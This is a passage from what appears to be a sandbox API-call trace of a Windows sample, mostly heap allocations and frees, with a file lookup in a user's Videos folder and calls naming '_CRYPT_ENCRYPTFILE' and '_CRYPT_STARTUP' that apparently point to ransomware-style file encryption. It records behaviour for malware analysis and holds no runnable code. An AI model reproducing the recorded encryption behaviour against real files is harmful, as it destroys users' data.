hHeap=0x1780000) returned 1 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.444] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.444] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0104.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0104.445] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0104.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0104.445] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0104.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0104.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0104.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0104.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0104.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0104.448] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0104.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0104.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0104.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.450] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff8cb0, ftCreationTime.dwHighDateTime=0x1d5ea29, ftLastAccessTime.dwLowDateTime=0x24650cc0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x24650cc0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0xd5f0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="--f6foz.avi", cAlternateFileName="")) returned 0x41ac000 [0104.450] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0104.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.451] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0104.451] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0104.451] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0104.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.451] PeekMessageW (in: lpMsg=0x144e304, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e304) returned 0 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0104.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0104.452] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 